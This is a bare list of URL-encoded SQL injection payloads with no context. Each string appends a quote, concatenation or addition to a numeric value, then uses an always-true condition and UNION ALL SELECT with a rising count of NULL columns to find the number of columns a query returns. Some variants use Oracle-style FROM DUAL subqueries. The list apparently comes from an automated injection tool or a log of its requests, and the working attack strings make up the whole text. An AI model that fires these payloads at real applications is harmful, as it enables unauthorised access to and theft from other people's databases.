1234.5%27%20WHERE%203855%3D3855%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20WHERE%207462%3D7462%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20WHERE%203336%3D3336%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20WHERE%208549%3D8549%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20WHERE%205686%3D5686%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20WHERE%206622%3D6622%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20WHERE%202786%3D2786%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20WHERE%209049%3D9049%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20WHERE%203835%3D3835%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20WHERE%207732%3D7732%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20WHERE%209420%3D9420%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20WHERE%202267%3D2267%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20WHERE%205407%3D5407%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20WHERE%208823%3D8823%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20WHERE%201301%3D1301%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20WHERE%203059%3D3059%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20WHERE%205611%3D5611%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20WHERE%208042%3D8042%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20WHERE%207460%3D7460%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%22%20WHERE%209355%3D9355%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1234.5%27%20%7C%7C%20%28SELECT%202065%20FROM%20DUAL%20WHERE%203008%3D3008%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%206756%20FROM%20DUAL%20WHERE%206597%3D6597%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%201575%20FROM%20DUAL%20WHERE%203739%3D3739%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%206724%20FROM%20DUAL%20WHERE%209976%3D9976%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%208854%20FROM%20DUAL%20WHERE%202664%3D2664%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%204895%20FROM%20DUAL%20WHERE%203594%3D3594%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%206828%20FROM%20DUAL%20WHERE%203203%3D3203%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%204916%20FROM%20DUAL%20WHERE%207462%3D7462%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%201145%20FROM%20DUAL%20WHERE%208279%3D8279%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%209637%20FROM%20DUAL%20WHERE%202697%3D2697%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%208516%20WHERE%203964%3D3964%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%207554%20WHERE%201009%3D1009%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%203946%20WHERE%208568%3D8568%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%204223%20WHERE%201906%3D1906%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%207998%20WHERE%202508%3D2508%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%204445%20WHERE%207375%3D7375%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%203175%20WHERE%203840%3D3840%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%201817%20WHERE%209768%3D9768%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%209432%20WHERE%205009%3D5009%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%204914%20WHERE%209166%3D9166%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29%20%7C%7C%20%27 1234.5%20%2B%20%28SELECT%209318%20FROM%20DUAL%20WHERE%203180%3D3180%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%209136%20FROM%20DUAL%20WHERE%209187%3D9187%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%204332%20FROM%20DUAL%20WHERE%207024%3D7024%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%203767%20FROM%20DUAL%20WHERE%208077%3D8077%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%206015%20FROM%20DUAL%20WHERE%207420%3D7420%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%209118%20FROM%20DUAL%20WHERE%208555%3D8555%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%207399%20FROM%20DUAL%20WHERE%201486%3D1486%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%201469%20FROM%20DUAL%20WHERE%207644%3D7644%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%204663%20FROM%20DUAL%20WHERE%204326%3D4326%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%205599%20FROM%20DUAL%20WHERE%201864%3D1864%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%206016%20WHERE%203569%3D3569%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%205546%20WHERE%202489%3D2489%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%201209%20WHERE%204837%3D4837%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%207217%20WHERE%206997%3D6997%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%207298%20WHERE%207838%3D7838%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%209376%20WHERE%203307%3D3307%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 1234.5%20%2B%20%28SELECT%205838%20WHERE%202204%3D2204%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20%29 